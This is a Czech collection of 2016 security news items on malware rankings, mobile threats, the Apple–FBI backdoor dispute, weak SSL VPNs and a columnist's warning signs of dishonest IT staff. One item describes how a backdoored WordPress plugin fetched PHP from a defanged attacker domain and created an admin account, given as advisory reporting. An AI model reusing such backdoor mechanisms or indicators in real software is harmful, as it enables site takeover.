Využívání firemního cloudu letos oproti roku 2015 výrazně vzrostlo (z 29 % na 43 %) a Česko se tak z loňských spodních příček dostalo na evropský průměr (45%). Téměř polovina (46 %) zaměstnanců si ale stále ještě posílá pracovní soubory na soukromý email, což je o 7 procentních bodů více než loni.
Využívání spotřebitelských úložišť se zdvojnásobilo (ze 14 % na 30 %). Soukromé maily ani běžná úložiště přitom nemohou zajistit potřebnou míru ochrany citlivých obchodních informací. Vyplývá to z nového ročníku průzkumu Náskok díky technologiím, který si nechal zpracovat Microsoft.
Lidé chápou nutnost dobře chránit informace, ke kterým na dálku přistupují. 9 z 10 šéfů a 79 % zaměstnanců zdůraznilo, že při práci mimo kancelář je nezbytné zajistit bezpečnost dat.
„Jenže praxe stále ještě pokulhává. Používání soukromých mailů pro sdílení pracovních dokumentů může pro firmy představovat časovanou bombu,“ uvedl Ondřej Novodvorský, ředitel pro malé a střední firmy z Microsoftu. "Do práce patří profesionální pracovní nástroje a platí to i o technologiích."
Není přitom řešním mobilitu omezovat. V letošním průzkumu uvedly téměř tři čtvrtiny (72 %) zaměstnanců českých SMB, že možnost pracovat mimo kancelář zvyšuje jejich produktivitu. Firmy by se jejím omezením připravily o důležitý zdroj výkonnosti, kreativity i nových obchodních příležitostí.
„Lidé dnes mobilně žijí a jsou zvyklí komunikovat a sdílet na dálku. Pokud firma svým zaměstnancům nenabídne bezpečné nástroje a nenaučí je správně používat, najdou si jinou cestu. A to může být pro bezpečnost firemních dat velký problém,“ řekl Ondřej Novodvorský.
Jaké jsou aktuálně nejčastější hrozby v Česku?
27.7.2016 Zdroj: ComputerWorld Hrozby Globálně nejvíce zlobí červ Bundpil, v Česku se ale momentálně nejčastěji šíří infikované přílohy e-mailu. Žebříček deseti největších bezpečnostních hrozeb v IT za měsíc duben zveřejnil Eset. Podle něj oproti březnu výrazně stouplo rozšíření škodlivého červa Bundpil, který se šíří prostřednictvím vyměnitelných médií. Druhou nejčastější hrozbu představuje trojan Nemucod, třetí je potom Javascript Danger.ScriptAttachment. Ten je ve světovém měřítku třetí, v České republice se jedná o hrozbu nejčastější.
„Červ Bundpil obsahuje URL, ze které se snaží do napadeného zařízení stáhnout několik souborů. Ty se pak instalují a umožňují do zařízení stahovat další škodlivé kódy,“ popisuje Petr Šnajdr, expert Esetu.
Bundpil předstihl trojského koně Nemucod. I ten však nadále zaznamenával zvýšený výskyt a v žebříčku deseti největších kybernetických hrozeb za měsíc duben se posunul na druhé místo.
Nemucod používají hackeři jako prostředek pro instalaci dalších škodlivých kódů a ovládnutí infikovaného zařízení. „Jde o klasický downloader, který se šíří jako příloha e-mailových zpráv. Nejčastěji se maskuje jako faktura nebo pozvánka k soudu,“ konstatuje Šnajdr.
Nově se v desítce nejaktivnějších škodlivých kódů objevuje na třetí pozici JS/Danger.ScriptAttachment, což je škodlivý soubor, který se šíří jako příloha e-mailu a může způsobit stažení malware. „Jde o detekci, která podle obecnějších kritérií posuzuje škodlivost zprávy. Detekce JS/Danger pokrývá jiným algoritmem varianty škodlivého kódu Nemucod, a proto je část Nemucodu detekována jako JS/Danger. V českém prostředí se jedná o hrozbu nejčastější, identifikujeme ji ve více než čtvrtině všech případů,“ vysvětluje Šnajdr.
Aktuálně se v přehledu nejčastějších kybernetických hrozeb objevuje i vir Agent.XWT, který otevírá vrátka dalším infiltracím. Nejrozšířenější hrozby v první pětici uzavírá kód ScrInject, který otevírá webové HTML stránky se škodlivými skripty nebo vloženými iframe objekty, které automaticky přesměrovávají zařízení ke stažení malware.
Druhá polovina žebříčku nejaktivnějších virů už neobsahuje tak rozšířené škodlivé kódy. Na šestou pozici se v dubnu posunul trojan HTML/Refresh, který přesměrovává internetový prohlížeč na nepříliš důvěryhodná URL. Sedmou pozici si stejně jako v březnu udržel virus Rammit, který se aktivuje při každém spuštění systému a jeho pomocí může útočník na dálku vypnout nebo restartovat napadený počítač.
Na osmou pozici z březnové třetí příčky v dubnu klesl malware Agent.CR, který ke svému maskování používá soubor typu LNK a v rámci něho zneužívá ke svým aktivitám systémový program rundll32.exe.
Devátou příčku pak obsadil polymorfní virus Sality, který při každém restartu operačního systému narušuje nebo odstraňuje bezpečnostní aplikace.
Dubnový žebříček nejrozšířenějších kybernetických hrozeb uzavírá malware Agent.BZ, který podobně jako Agent.CR využívá volání škodlivé funkce ze své DLL knihovny pomocí runddl32.exe.
Top 10 hrozeb - globální přehled
Win32/Bundpil JS/TrojanDownloader.Nemucod JS/Danger.ScriptAttachment Win32/Agent.XWT HTML/ScrInject HTML/Refresh Win32/Ramnit LNK/Agent.CR Win32/Sality LNK/Agent.BZ Top 10 hrozeb - Česká republika
27.7.2016 Zdroj: ComputerWorld Hrozby Důvěra a IT jdou ruku v ruce. Zde jsou varovná znamení, kterých je potřebné si všímat, abyste se u některých zaměstnanců nespálili. Přes všechny důrazy na nástroje a pomůcky se IT stále velmi týká lidí, kteří tyto nástroje a pomůcky vyvíjejí a používají. Spolupráce, vzájemný respekt a nadšení pro práci – to vše a také mnohem více je nezbytné k získání užitečných výsledků bez ohledu na to, zda váš tým IT dodává kód, opravuje chyby, pracuje s firemními uživateli nebo zabezpečuje systémy společnosti.
Jak se technologie stávají silnějšími a počítačové systémy jsou stále více zaplněné citlivými údaji, dostává se jeden lidský aspekt IT pod podrobnější kontrolu: Důvěra.
Během posledních třiceti let se mi povedlo získat úžasné zaměstnance. Lidé, u kterých mi intuice napověděla, že jde o správné kandidáty na pracovní pozici, prokázali své kvality nad má nejdivočejší očekávání.
Občas jsem však opominul včasná varovná znamení, že jinak skvělý kandidát či talentovaný a tvrdě pracující zaměstnanec postrádá, řekněme, silný morální kompas.
Když někdo, koho jste obdivovali, důvěřovali mu a věnovali se mu, se nakonec zachová vůči firmě jako darebák, nelegálně vniká do soukromé korespondence nebo používá údaje kreditní karty zákazníka na nákup počítačového vybavení pro svůj domov, začne vás nesprávně udělená důvěra v tuto osobu pronásledovat.
Pravdou je, že nelze vždy říci, kdo má potenciál stát se lumpem. Během své kariéry jsem však našel několik varovných příznaků, kterých je dobré si všímat. Žádný z nich není spolehlivý a je vždy dobré, aby lidé využívali výhodu pochybnosti.
Považujte tedy následující příznaky spíše za určitou formu nedokonalého lakmusového papírku než za těžce získané lekce vztahů se zaměstnanci, kteří se začali chovat jako darebáci.
Varovný příznak č. 1: Nečekaný nezdar při ověřování minulosti
Jedním z nejlepších zaměstnanců, které jsem za posledních třicet let získal, byla žena, která mi řekla, že jako náctiletá udělala hroznou chybu. Byla součástí skupiny pracovníků na námořní základně ve středisku, kde byl odhalen podvod s fiktivními výplatami finančních náhrad. Byla stíhána u soudu a tento podvodný čin skončil trvalým záznamem v jejím trestním rejstříku.
Během mého rozhovoru s ní byla o tomto incidentu velmi upřímná a vypadala velmi zkroušeně. Ujistila mě, že se něco takového už nestane. Při kontrole její minulosti jsem zjistil, že to byl jediný problém, který kdy měla. Dokonce ani nedostala žádnou pokutu za překročení rychlosti.
Najal jsem ji tedy a o deset let později podává špičkové výkony. Nyní pracuje jako manažerka. Její zaměstnanci ji milují a ona nás nikdy nezklamala. Možná že není divu, že také byla jednou z mých nejlepších spolupracovníků při odhalování nepoctivých pracovníků.
Je to neocenitelná dovednost. Je to také důkaz, že by žádná společnost či zaměstnavatel neměli automaticky diskvalifikovat z přijímacího procesu někoho, kdo je schopen prokázat, že už nemá nic společného se svým dřívějším špatným chováním.
Naproti tomu mi několik dalších potenciálních zaměstnanců neřeklo nic o svých záznamech v trestním rejstříku a namísto toho čekali, až povinná kontrola trestní minulosti odhalí jejich konflikt se zákonem.
Tato forma lži opomenutím se pro mě stala důvodem k odmítnutí. Obvykle v době, kdy ke kontrole minulosti dochází, už daná osoba je u nás zaměstnaná a pracuje v dočasné roli. Je to docela šok zjistit, že někdo, komu jste věnovali svůj čas a důvěru, k vám nebyl upřímný.
Ano, mnozí lidé váhají odhalit své trestní přestupky z minulosti, ale důvěra je hned od počátku zcela zásadní nutností.
Byla to těžce získaná zkušenost. Jeden zaměstnanec, kterého jsme si ponechali i po zjištění problémů s jeho minulostí, nakonec ukradl počítačové vybavení naší společnosti za tisíce dolarů.
Zjistil jsem to, když mě požádal, abych se u něj doma zastavil na diagnostiku případného malwaru v jeho domácím počítači. Když jsem vstoupil do jeho domu, uviděl jsem, že má počítačový rack za několik tisíc dolarů a síťové vybavení stejné, jako jsme měli v práci.
Když si uvědomil, že jsem vybavení poznal, jeho výraz byl jasný. Byla chyba mě zvát domů, minimálně aniž nejprve zakryl ukradené vybavení.
Snažil se mě přesvědčit, že to bylo vyřazené vybavení, které účetní oddělení již odepsalo, a že měl ústní souhlas předchozího šéfa, aby si vzal vybavení domů pro účely odborné přípravy. Rychlý telefonát a kontrola viditelných firemních sériových čísel prokázaly, že šlo o aktivní vybavení naší společnosti. Naštěstí většina zločinců není příliš inteligentní.
Varovný příznak č. 2: Říká, že mu minulí zaměstnavatelé nevěřili
Následující rčení mi v životě pomáhá: „Pokud jste vždy oběť, jste pravděpodobně problémem vy sami.“ Mnoho zaměstnanců, ne-li většina, mělo špatné zkušenosti s jedním nebo několika předchozími zaměstnavateli.
Často je to důvod, proč odešli. Pokud si však pracovník stěžuje na všechny své minulé zaměstnavatele, je téměř jisté, že se na tento seznam dostanete i vy, a to i za sebemenší problém.
Zde je varovným příznakem, že jim minulí zaměstnavatelé nevěřili – zejména když poté popisují situace s deficitem či úplnou absencí zdravého rozumu. Vzpomínám si na jednoho pracovníka, který si stěžoval, že se jeho starému zaměstnavateli nelíbilo, že se díval na soubory s výplatními páskami manažerů.
Udělal jsem malou kontrolu a zjistil jsem, že přistupoval ke všem druhům dat, u kterých k tomu neměl dobrý důvod. Jsem si jistý, že si mě přidal na svůj seznam.
Varovný příznak č. 3: Říká, že dokáže vniknout do systémů kolegů či firmy
Většina zaměstnanců, kteří vnikají do záležitostí svých kolegů, svým kolegům říká, že to dokážou udělat nebo že mohou proniknout do podnikových systémů. Je to divné, ale často je to pravda.
Pokud nespokojený pracovník mluví o tom, co by mohl udělat, kdyby chtěl, považujte to za varování. Ve většině případů nikdo nevypráví vedení o hrozbě, aniž o tom nijak nepřemýšlí, a pokud ano, vedení to nevezme na vědomí.
Ponaučení: Hovory o takových záležitostech by měly být dostatečné k přijetí opatření. Zaprvé – vzdělávejte své zaměstnance, aby tyto pasivně-agresivní hrozby hlásili. Když jsou ohlášené, berte je vážně.
Zajistěte, aby si nadřízený promluvil s pracovníkem za přítomnosti zástupce personálního oddělení, a zkontrolujte, zda pevné disky dotyčného zaměstnance neobsahují hackovací nástroje a důkazy neoprávněného přístupu.
To vše platí i pro zaměstnance přistižené s nedovolenými hackovacími nástroji (pokud ovšem nejsou potřeba pro jejich práci). To samé platí pro zaměstnance, kteří vlastní sbírky hesel jiných uživatelů (pokud není uchovávání těchto hesel součástí jejich pracovní činnosti).
Jestliže se během vyšetřování zjistí, že zaměstnanci vykonávali aktivní neoprávněné hackování, měli by být varováni, že se takové chování netoleruje a že může vyústit v jejich okamžité propuštění. Aktivity těchto zaměstnanců byste měli určitou dobu intenzivně sledovat.
Možná si myslíte, že jsem příliš tvrdý, ale desítky let zkušeností mě naučily potlačovat tyto hrozby již v zárodku. Přistihl jsem pár zaměstnanců s daty, která by mít neměli, a věřím, že dostatečně seriózní přístup k takové události může pomoci připomenout nevinným pracovníkům, aby se neodchylovali od toho, co je správné, a vyhnuli se problémům.
Varovný příznak č. 4: Přepíná obrazovku svého počítače, tabletu či mobilu, když jdete kolem
Tento scénář nastává často: Zastavíte se u kóje a vidíte spolupracovníka, jak rychle přejde na novou obrazovku. Je více než pravděpodobné, že se snaží zakrýt skutečnost, že se právě ulívá a nepracuje na firemních záležitostech.
Když však vidíte, jak přepíná obrazovky, i když očividně pracuje na podnikových záležitostech, je to velké varování. Všechny webové stránky a databáze, na kterých takoví lidé pracují, by neměly být před vedoucím týmu tajné.
Pokud se to stane více než párkrát, zajistěte důkladnou kontrolu.
Varovný příznak č. 5: Nikdy si nebere dovolenou
Staré účetní moudro radí být opatrný na zaměstnance, kteří si nikdy neberou dovolenou. Protože musejí stále zahlazovat stopy, aby je nikdo nechytil, nemohou si vzít ani den volna. To je jeden z důvodů, proč mnoho firem své pracovníky nutí, aby si brali dovolenou.
Internetem kolují tisíce virů, stále více jich cílí na chytré telefony a tablety
2.5.2016 Hrozby V současnosti internetem koluje několik tisíc virů. Při jejich šíření se přitom počítačoví piráti stále častěji zaměřují na mobilní zařízení, tedy na smartphony a tablety. Vyplývá to z analýzy bezpečnostní společnosti Check Point. „V průběhu března jsme identifikovali více než 1300 různých malwarových rodin, což je drobný pokles oproti předchozímu měsíci. To ovšem neznamená, že by byl březen bezpečnějším měsícem, jen to ukazuje na skutečnost, že kyberzločinci nemusí vyvíjet zcela nový malware pro útočné aktivity,“ uvedl David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Označení malwarová rodina výzkumníci používají pro pojmenování různých škodlivých kódů, které však mají stejný základ. Například vyděračské viry z rodiny ransomware, které zašifrují data na pevném disku a za jejich odemčení požadují výkupné, tvoří pouze jednu „rodinu“. Různě upravených ransomwarů přitom kolují internetem stovky.
Rodin je tedy skutečně „pouze“ 1300, ve skutečnosti se ale aktuální hrozby počítají na tisíce. Klidně i jen drobnou úpravou části zdrojového kódu si totiž kyberzločinci zpravidla zajistí, že již nahlášená a známá počítačová hrozba je najednou úplně nová – většina antivirů je pak na takové hrozby minimálně v prvních dnech jejich rozšíření krátká.
Nárůst mobilních hrozeb Patrný je nárůst mobilních hrozeb, škodlivé kódy se tedy častěji zaměřují na chytré telefony a tablety. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl Řeháček s tím, že bezpečnostním expertům v současnosti dělá velké vrásky na čele především hrozba zvaná HummingBad. Právě ta se dostala mezi deset nejrozšířenějších virových nákaz. [celá zpráva]
HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy v zařízení maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.
„Instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako jsou například instalace keyloggerů, krádeže přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat,“ konstatoval Řeháček.
Jinými slovy počítačoví piráti převezmou nad napadeným přístrojem naprostou kontrolu. Mohou jen vyčkávat a sledovat aktivitu uživatele, stejně tak ale dovedou odchytávat zprávy týkající se internetového bankovnictví. Teoreticky tedy mohou uživatele připravit o peníze.
Zaměřují se na Android Také další dvě hrozby, které patřily v březnu k těm nejrozšířenějším, cílily na chytré telefony a počítačové tablety. Konkrétně na modely s operačním systémem Android.
Jedním z nich je například AndroRAT, který se dokáže navázat na nějakou legitimní aplikaci. Do mobilního zařízení se tak často dostane bez vědomí uživatele. Ten si jej stáhne zpravidla z neoficiálních internetových obchodů s nějakým jiným programem. Pak už nic nebrání útočníkům, aby převzali plnou kontrolu nad napadeným strojem.
Na pozoru by se měli uživatelé mít i před hrozbou zvanou Iop. „Tento malware instaluje aplikace a zobrazuje nadměrné množství reklam. Množství reklamy a nainstalovaných aplikací neumožňuje uživateli používat přístroj jako obvykle,“ uzavřel Řeháček.
Na Android se počítačoví piráti nezaměřují náhodou. Tato mobilní platforma je aktuálně nejrozšířenější, a tak mají kyberzločinci větší šance, že budou při útocích úspěšní.
Skončila podpora pro SQL Server 2005, jeho provozování může být nebezpečné
14.4.2016 Hrozby Včera skončila rozšířená podpora všech edic databázového systému SQL Server 2005, oznámil Microsoft. V praxi to znamená, že na tento systém již nebudou vydávány žádné bezpečnostní opravy a aktualizace.
Využívání nepodporovaného řešení s sebou samozřejmě nese možné komplikace souladu s potřebnými předpisy a normami daného odvětví a vyšší náklady na údržbu teď už zastaralého systému.
Zákazníci mají podle Microsoftu možnost přejít na řešení SQL Server 2014 nebo na cloudové řešení Azure SQL Database (pokud samozřejmě chtějí zůstat na platformě ohoto dodavatele).
V březnu byly také představené klíčové funkce nadcházející verze SQL Server 2016, jež zákazníkům přinese zvýšenou bezpečnost dat i poměrně výrazné zvýšení výkonu (30-100krát).
S novou verzí SQL Serveru navíc podle výrobce půjde využívat BI řešení na jakémkoliv zařízení či se bude možné propojit s cloudovými službami pro snížení nákladů či lepší škálovatelnost.
FBI by mohla špehovat lidi pomocí kamery v mobilu, varuje Apple
19.3.2016 Hrozby O sporu mezi společností Apple a vyšetřovateli z FBI, který se týká odblokování iPhonu zabijáka ze San Bernardina, bude už příští týden rozhodovat soud v USA. Viceprezident počítačového gigantu pro software a služby Eddy Cue nyní upozornil, že konečný verdikt ve prospěch FBI by mohl vytvořit velmi nebezpečný precedens, který by mohl přinést například špehování lidí na dálku pomocí kamery v mobilu. „Když nás donutí udělat nový systém se ‚zadními vrátky‘, jak to bude pokračovat dál?,“ prohlásil Cue podle serveru Apple Insider.
Bojí se především toho, že se budou nároky stupňovat. „Pro příklad, jednou po nás FBI bude chtít, abychom zpřístupnili fotoaparát v telefonu či mikrofon. To jsou věci, které teď dělat prostě nemůžeme,“ vysvětlil viceprezident Applu, co by mohlo přinést rozhodnutí soudu.
Celý spor se rozhořel kvůli tomu, že se vyšetřovatelům z FBI nepodařilo dostat do uzamčeného iPhonu islámského radikála. Ten měl svůj iPhone nastavený tak, aby se po zadání deseti nesprávných přístupových hesel automaticky vymazal.
Nejde jen o zabijákův iPhone Právě kvůli neúspěchu vyšetřovatelů soud společnosti Apple nařídil, aby tuto funkci vypnula. Vedení amerického počítačového gigantu to však odmítlo s tím, že to technicky není možné. Jedinou cestou, jak iPhone zpřístupnit, je údajně vytvoření „zadních vrátek“ do operačního systému iOS. Ten využívají právě chytré telefony iPhone a počítačové tablety iPad.
To ale šéf Applu Tim Cook odmítá, protože se bojí případného zneužití. Implementací takového nástroje do zmiňované mobilní platformy by totiž byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti.
Na začátku března se totiž ukázalo, že FBI nejde pouze o zabijákův iPhone. Jen od loňského října chtěla odemknout celkem devět zařízení. [celá zpráva]
FBI chce zdrojový kód systému FBI se nyní snaží prostřednictvím soudu vedení Applu donutit, aby „začalo spolupracovat“. V opačném případě chtějí dosáhnout vyšetřovatelé toho, aby jim musel americký počítačový gigant vydat kompletní zdrojový kód systému. S jeho pomocí by se totiž patrně také do zabijákova iPhonu dostali.
Cook se kvůli celému sporu dokonce již obrátil na prezidenta USA Baracka Obamu. S jeho pomocí by se chtěl snažit prosadit vytvoření speciálního výboru, který by se problematikou šifrování mobilů zabýval.
Na jeho žádost však úřady zatím neodpověděly. Není tedy jasné, zda Cooka Obama přijme.
Barack Obama chce opět backdoor v softwaru ze zákona
13.3.2016 Hrozby Barack Obama chce opět backdoor v softwaru ze zákonaDnes, Milan Šurkala, aktualitaPoslední týdny se přetřásá kauza FBI a Applu, střídají se názory, zda má Apple odemknout mobil teroristů nebo nikoli. Americký prezident Barack Obama se v jednom rozhovoru zmínil, že zadní vrátka v softwaru by měla být povinná. V jednom z rozhovorů s americkým prezidentem Barackem Obamou byl dotázán na názor ohledně kauzy FBI a Applu (zda má Apple odemknout mobil teroristy a zpřístupnit tak data pro FBI), ten se ale k tomuto případu nechtěl vyjadřovat. Přesto jeho reakce vcelku mířila právě na tento případ. Hovořil o tom, že nechce, aby vláda mohla prohlížet mobilní telefony, jak se jí zlíbí, ale zároveň podotknul, že neprolomitelné šifrování v uživatelském sektoru je obrovský problém.
Důvodem je např. to, jak by při neprolomitelném šifrování mohly bezpečnostní složky odhalit např. dětskou pornografii, teroristické plány nebo třeba daňové úniky. Už zde je jasné, že chce monitorování ve velkém rozsahu. Dle Obamy by software měl mít zadní vrátka (backdoor), která by umožňovala vybraným lidem dostat se do každého zařízení a chce dosáhnout nějakého kompromisu. Cílem je, aby tento klíč mělo co nejméně lidí, nicméně i tak je rozhodně docela zvláštní využívat nejpokročilejší šifrovací systémy, když víte, že venku je pár lidí, kteří znají klíč "ze zákona". Šifra s klíčem v rukou vlády ale těžko bude "kompromisní". Připomeňme, že soud Apple versus FBI bude už 22. března a už v minulém roce vydal Obama vyhlášku, která nařizuje sdílení dat s vládou.
Plugin pro WordPress se může změnit v hrozbu, stačí změna majitele
7.3.2016 Zdroj: Lupa Hrozby
Roky spolehlivé pluginy pro WordPress se mohou proměnit v zásadní problém. Stačí, když se v nich objeví backdoor, který umožní převzít váš web. Custom Content Type Manager (CCTM) je poměrně populární plugin pro WordPress, který slouží pro vytváření vlastních typů příspěvků. Najdete jej nainstalovaný na více než desítce tisíc webů. Sucuri ale varuje, že se v CCTM objevil backdoor.
Přišli na něj tak, že řešili napadený web a objevili podezřelý soubor auto-update.php právě ve složce s CCTM. Ten stahuje obsah z hxxp://wordpresscore .com/plugins/cctm/update/ a uloží ho do složky s CCTM jako PHP, tedy spustitelný soubor.
Při bližším zkoumání se potvrdilo, že zadní vrátka jsou přímo součástí CCTM, že nejde o výsledek napadení odjinud. A zjistili také to, že se zadní vrátka v CCTM objevila teprve 16. února 2016 v souvislosti s novým vlastníkem pluginu.
Právě změna vlastníků, ať už tím, že někdo původní plugin koupí, či se k vlastnictví dostane jiným způsobem, bývá nejčastějším momentem, kdy se z neškodných a spolehlivých věcí stávají škodlivé. Samotné CCTM přitom před touto změnou nebylo aktualizované dobrých deset měsíců – to je také jeden z příznaků, že je třeba si dát pozor: dlouho neaktualizované věci, které náhle dostanou aktualizaci. Sucuri upozorňují, že stejný nový vlastník se objevil u Postie pluginu.
Výše zmíněné auto-update.php ale není jedinou nebezpečnou změnou. V index.php se objevil přídavek, který se postará o odeslání informace na výše uvedené wordpresscore .com pokaždé, když se někdo přihlásí do svého webu. Velmi pravděpodobně slouží k tomu, aby se útočník dozvěděl, kde všude je plugin instalovaný.
Ve When a WordPress Plugin Goes Bad je také velmi detailní popis toho, jakým způsobem bylo právě CCTM použito pro hack. Ten spočíval ve využití auto-update.php pro stažení skriptu, který se postaral o změnu (vytvoření) wp-options.php. Následovaly zásahy do dalších souborů s vytvořením nového účtu správce. Změna dalších souborů navíc přinesla to, že útočník získal kompletní přihlašovací údaje.
Což ale není všechno. Další poměrně zvláštní změnou bylo přidání aktivace jquery.js z domény donutjs.com. Ta vypadá, jako kdyby skutečně byla zdrojem pro klasické jQuery, ale má řadu velmi podezřelých příznaků. Při bližším zkoumání zjistíte, že ve skutečnosti o jQuery vůbec nejde, uvnitř najdete pouze další skript, který nahlašuje instalaci/použití CCTM.
Máte ve Wordpressu CCTM nebo Postie?
Pokud ano, pak máte značný problém a měli byste se zbavit nejenom CCTM, ale také znovu nahrát čisté soubory wp-login.php, user-edit.php a user-new.php. Poté změnit hesla všem uživatelům, zrušit uživatele support a odstranit soubor wp-options.php, který se vám objevil v kořenové složce.
Pokud se bez CCTM neobejdete, tak je potřeba jít na poslední verzi, která není postižena – tou je 0.9.8.6. A k tomu nezapomenout na to, že automatické aktualizace (pokud jste je povolili) vám ji opět přepíší na napadenou variantu.
Studie: devět z deseti SSL VPN je beznadějně nebezpečných
7.3.2016 Hrozby
Používat VPN je v dnešních dnech jedna z důležitých součástí bezpečnější komunikace po internetu. Ale co když samy VPN služby nejsou bezpečné? Devět z deseti SSL VPN je nebezpečných pro uživatele, používá zastaralé či nedostatečné formy šifrování a představuje hrozbu pro data, která skrz ně posíláte. To je výsledek testu 10 436 veřejně dostupných SSL VPN serverů (z celkového počtu asi 4 milionů náhodně vybraných adres) od těch největších výrobců jako je Cisco, Fortinet či Dell.
77 % z nich používá SSLv3 protokol, zhruba stovka dokonce SSLv2. Oba tyto protokoly jsou nejenom zastaralé, ale hlavně mohou být zneužité řadou zranitelností a útoků. Ani jeden není považován za bezpečný.
76 % používá nedůvěryhodné SSL certifikáty, což je vystavuje riziku MITM (Man in the middle) útoku. Což v praxi může znamenat, že s pomocí falešného serveru se hackeři mohou dostat ke všemu, co posíláte.
74 % má certifikáty s nebezpečným SHA-1 podpisem, 5 % dokonce používá ještě starší MD5 technologie.
41 % používá nebezpečné 1024 bitové klíče pro RSA certifikáty. Obecně se předpokládá, že cokoliv pod 2048 bitů délky není bezpečné.
10 % SSL VPN serverů je založeno na Open SSL a zároveň stále napadnutelné nyní již hodně starým Heartbleed útokem (zranitelnost objevená v dubnu 2014).
Pouze 3 % vyhovují PCI DSS požadavkům a žádné SSL VPN nevyhovují NIST pravidlům.
Podrobnější informace najdete v 90% of SSL VPNs use insecure or outdated encryption, putting your data at risk, tedy přímo u autorů studie (testu), společnosti High-Tech Bridge.
Aktualizace Flash Playeru je ve skutečnosti scareware
8.2.2016 Hrozby Na pozoru by se měli mít v posledních dnech uživatelé počítačů od společnosti Apple. Jako lavina se totiž internetem šíří škodlivý virus, který se vydává za aktualizaci populárního programu Flash Player právě pro operační systém Mac OS X. Ve skutečnosti jde ale o tzv. scareware, varoval Národní bezpečnostní tým CSIRT. „Uživatelé OS X by se měli mít na pozoru před novou kampaní, při které jsou přesvědčováni, aby provedli update Adobe Flash Playeru,“ varoval konstatoval Pavel Bašta, bezpečnostní analytik týmu CSIRT, který je provozován sdružením CZ.NIC.
Místo updatu si ale podle něj uživatelé stáhnou do svých počítačů s logem nakousnutého jablka scareware. „Ten se pak pokouší přesvědčit uživatele k zavolání na linku podpory pod záminkou vyřešení údajného technického problému,“ doplnil Bašta.
Přesměruje uživatele na podvodný web O žádné stránky technické podpory ve skutečnosti samozřejmě nejde. Scareware přesměruje uživatele na podvodný web, který obsahuje další hrozby. Tak se do počítače dostanou další nezvaní návštěvníci.
Podobně pracují viry z rodiny scareware prakticky vždy. Snaží se v uživateli vzbudit dojem, že je s jejich počítačem něco špatně a místo skutečné pomoci jej přesměrují na podvodné stránky. U lidí zpravidla v takových situacích sílí negativní emoce, že je s jejich strojem něco špatně, a nejsou tolik pozorní – snadno si pak do PC pustí další škodlivé viry.
Flash Player používají milióny lidí V současnosti se falešná aktualizace Flash Playeru šíří výhradně na strojích s operačním systémem Mac OS X od Applu. Není ale vyloučeno, že se v dohledné době objeví totožná hrozba cílící také na majitele strojů s Windows nebo Linuxem.
Flash Player si počítačoví piráti nevybrali náhodou. Tento populární přehrávač videí na internetu používají milióny lidí na celém světě, díky čemuž mohou být kyberzločinci během svých útoků velmi úspěšní. S jediným virem totiž mohou napadnout relativně velké množství uživatelů.
Prohlížeč Avast SafeZone byl nebezpečnější než výchozí Chromium
6.2.2016 Hrozby Prohlížeč Avast SafeZone byl nebezpečnější než výchozí ChromiumDnes, Milan Šurkala, aktualitaAntivirové společnosti někdy nabízí speciální verze prohlížečů, které mají být ještě bezpečnější než ty běžně používané. Skutečnost je ale často opačná, což platilo i pro Avast SafeZone. Ten trpěl na chybu, která byla ve Chromiu, z něhož vychází, ošetřena. Už v minulosti se stalo, že speciální "bezpečná" varianta internetového prohlížeče dodávaná v balíčku antivirových programů byla méně bezpečná než prohlížeč, z něhož tato verze vycházela. Jednou z posledních byla např. společnost Comodo, jejíž prohlížeč Chromodo měl některé chyby navíc. Postihlo to také Avast a jeho prohlížeč SafeZone (Avastium). Ten vychází z enginu Chromium. SafeZone bohužel trpí na chybu, kdy je možné vzdáleně spustit prohlížeč a s jeho pomocí procházet celý počítač uživatele.
Stačí k tomu prohlížet útočnou stránku pomocí jakéhokoli prohlížeče, kdy škodlivý kód v JavaScriptu dokáže přes vzdálené volání procedur spustit SafeZone a převzít nad ním kontrolu. Zatímco prohlížeče obvykle dokážou lokálně procházet jen lokální počítač nebo síť, SafeZone tuto ochranu nemá a umožňuje toto procházení i počítačům zvenku. Zajímavé je to zejména proto, že Chromium, z něhož SafeZone vychází, touto ochranou disponuje. Na chybu přišel Tavis Osmandy z Google Project Zero a oznámil ji 18. prosince minulého roku. Problém demonstroval, kdy napsal kód ke vzdálenému přístupu k počítači a pomocí prohlížeče je možné vypsat obsah disku C:. Prohlížeč SafeZone se nyní dočkal opravy (verze 2016.11.1.2253) a už by nemělo být možné vzdáleně přebírat kontrolu nad prohlížečem SafeZone.
Železnici hrozí kyberútoky, varují bezpečnostní experti. Je málo chráněná
11.1.2016 Hrozby Moderní železniční systémy používají komponenty, u nichž existuje velké množství bezpečnostních slabin. Přišli na to výzkumníci ze skupiny SCADA StrangeLove, kteří se zaměřují na analýzu bezpečnostních rizik u veřejných průmyslových systémů. Skupina se věnovala prověřování bezpečnostního zabezpečení železničních systémů poslední tři roky a identifikovala řadu nedostatků, které mají vliv na signalizační systém, ale i další návazné systémy používané v železniční dopravě. Ve většině případů se jedná o systémy, které nejsou nijak napojeny na internet. V opačném případě by kvůli několika málo bezpečnostním dírám mohli útočníci ohrozit celou síť i systémy napojené na konkrétní bod jejich průniku.
Mezi nejvíce ohroženými zařízeními byl Sibas, systém ochrany vlaků používaný na železnicích řady evropských zemí. Jde o automatizační systém, který pomocí mikroprocesorů optimalizuje výkonu jednotlivých složek u kolejových vozidel.
Používají jej například německé rychlovlaky ICE, japonské Šinkanzeny či soupravy Velaro, které jezdí v Německu, Španělsku, Číně, Rusku a Turecku. Je zranitelný, protože používá regulátor WinAC RTX, který je součástí řešení Siemens Simatic, u kterého analytici již dříve lokalizovali bezpečnostní problémy.
Hackeři by mohli způsobit záměrnou nehodu, zastavit vlaky nebo dokonce měnit jejich trasy. experti ze skupiny SCADA StrangeLove U většiny evropských železnic je navíc zranitelný systém CBI používaný pro trasování vlaků, který je zásadní pro optimalizaci práce železničních systémů a zabraňuje kolizím vlaků na stejné koleji.
